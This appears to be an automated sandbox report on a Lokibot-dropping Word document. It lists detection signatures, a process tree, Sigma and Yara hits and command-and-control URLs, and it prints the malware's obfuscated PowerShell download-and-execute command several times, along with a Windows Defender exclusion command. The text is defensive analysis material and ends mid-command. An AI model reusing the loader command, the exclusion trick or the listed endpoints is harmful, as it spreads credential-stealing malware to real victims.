Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO-000041492.docx.doc

Overview

General Information

Sample name:PO-000041492.docx.doc
Analysis ID:1559210
MD5:78be86ebe4907d4195a9f9b7b09d9454
SHA1:1136319ab7cb1b7b50ea3c93a8fd25c402c7f971
SHA256:36121afec9959963b1c1d30dcb13b9031e445cebac5a62b353297c94bb3c2f75
Tags:docuser-lowmal3
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Lokibot
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Drops PE files with benign system names
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Microsoft Office drops suspicious files
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
PowerShell case anomaly found
Powershell drops PE file
Shellcode detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Equation Editor Network Connection
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3292 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3752 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • mshta.exe (PID: 3820 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
        • powershell.exe (PID: 3876 cmdline: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 4016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • csc.exe (PID: 1908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline" MD5: F8F36858B9405FBE27377FD7E8FEC2F2)
            • cvtres.exe (PID: 2960 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES950F.tmp" "c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • wininit.exe (PID: 2092 cmdline: "C:\Users\user\AppData\Roaming\wininit.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)
            • powershell.exe (PID: 2164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • wininit.exe (PID: 772 cmdline: "C:\Users\user\AppData\Roaming\wininit.exe" MD5: 66B03D1AFF27D81E62B53FC108806211)
    • verclsid.exe (PID: 2212 cmdline: "C:\Windows\system32\verclsid.exe" /S /C {00020830-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
  • EXCEL.EXE (PID: 2832 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EXCEL.EXE (PID: 3280 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/maxzi/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
    • 0x154b:$obj1: \objhtml
    • 0x1588:$obj2: \objdata
    • 0x1570:$obj3: \objupdate
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
    • 0x154b:$obj1: \objhtml
    • 0x1588:$obj2: \objdata
    • 0x1570:$obj3: \objupdate
    SourceRuleDescriptionAuthorStrings
    00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x21b60:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000010.00000002.422492450.00000000020E1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0xef13:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 29 entries
          SourceRuleDescriptionAuthorStrings
          16.2.wininit.exe.326edc0.5.raw.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
            16.2.wininit.exe.326edc0.5.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              16.2.wininit.exe.326edc0.5.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                16.2.wininit.exe.326edc0.5.raw.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                16.2.wininit.exe.326edc0.5.raw.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                Click to see the 37 entries

                Exploits

                barindex
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 66.63.187.231, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3752, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49169
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3752, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\goodtoseeuthatgreatthingswithentirethingsgreatfor[1].hta

                System Summary

                barindex
                Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49169, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3752, Protocol: tcp, SourceIp: 66.63.187.231, SourceIsIpv6: false, SourcePort: 80
                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3876, TargetFilename: C:\Users\user\AppData\Roaming\wininit.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", ParentImage: C:\Users\user\AppData\Roaming\wininit.exe, ParentProcessId: 2092, ParentProcessName: wininit.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe", ProcessId: 2164, ProcessName: powershell.exe
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", CommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgI
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" , CommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3752, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" , ProcessId: 3820, ProcessName: mshta.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt, ProcessId: 4016, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine: "C:\Users\user\AppData\Roaming\wininit.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wininit.exe, NewProcessName: C:\Users\user\AppData\Roaming\wininit.exe, OriginalFileName: C:\Users\user\AppData\Roaming\wininit.exe, ParentCommandLine: "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgIC